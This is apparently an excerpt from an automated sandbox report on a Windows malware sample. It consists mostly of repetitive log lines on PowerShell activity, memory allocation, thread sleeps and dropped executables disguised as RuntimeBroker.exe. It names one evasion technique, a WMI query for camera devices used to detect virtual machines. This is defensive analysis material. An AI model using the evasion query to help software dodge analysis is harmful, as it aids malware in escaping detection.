Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Memory allocated: 940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Memory allocated: 1A5C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Memory allocated: 11A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Memory allocated: 1ADA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Memory allocated: 3410000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Memory allocated: 1B410000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Memory allocated: D50000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Memory allocated: 1AB10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Memory allocated: B10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Memory allocated: 1A5C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Memory allocated: A90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Memory allocated: 1A5F0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Memory allocated: 1320000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Memory allocated: 1AE50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Memory allocated: DB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Memory allocated: 1ACA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Memory allocated: 21C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Memory allocated: 1A340000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Memory allocated: F40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Memory allocated: 1ABA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Memory allocated: 1370000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Memory allocated: 1B0A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Memory allocated: 9D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Memory allocated: 1A5A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Memory allocated: 11A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Memory allocated: 1AE70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Memory allocated: 1530000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Memory allocated: 1B370000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599523	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 598841	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 598591	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 598190	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 597170	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 596926	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 596561	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 596452	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 596215	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 594427	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 593891	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 593702	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 593250	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 592844	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 591391	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 591032	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 590672	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 590047	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 589000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 588532	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 588297	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 588110	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 587954	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 587813	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 587698	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 587578	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 587274	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 586485	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 586360	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 586204	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 585954	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 585422	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 585312	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 585172	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 585057	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 584922	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 584797	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 584672	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 583644	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 583374	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 583005	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 582797	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 582374	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Window / User API: threadDelayed 1271	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Window / User API: threadDelayed 1142	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5269	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6165	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Window / User API: threadDelayed 4772	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Window / User API: threadDelayed 4935	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Window / User API: threadDelayed 366
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Window / User API: threadDelayed 835
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Window / User API: threadDelayed 367
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Window / User API: threadDelayed 364
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4701
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4655
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Window / User API: threadDelayed 366
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Window / User API: threadDelayed 366
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Window / User API: threadDelayed 366
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Window / User API: threadDelayed 367
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Window / User API: threadDelayed 364
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Window / User API: threadDelayed 365
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Window / User API: threadDelayed 367
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Window / User API: threadDelayed 365

Source: C:\Users\user\Desktop\ogVinh0jhq.exe TID: 7504	Thread sleep count: 1271 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe TID: 7496	Thread sleep count: 1142 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe TID: 7480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768	Thread sleep count: 5269 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768	Thread sleep count: 200 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep count: 6165 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep count: 151 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -599523s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -599250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -599141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 5960	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -598841s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -598591s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -598484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -598190s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -597421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -597170s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -596926s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -596797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -596561s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -596452s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -596215s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -594427s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -593891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -593702s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -593250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -592844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -591391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -591032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -590672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -590047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -589000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -588532s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -588297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -588110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -587954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -587813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -587698s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -587578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -587274s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -586485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -586360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -586204s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -585954s >= -30000s	Jump to behavior
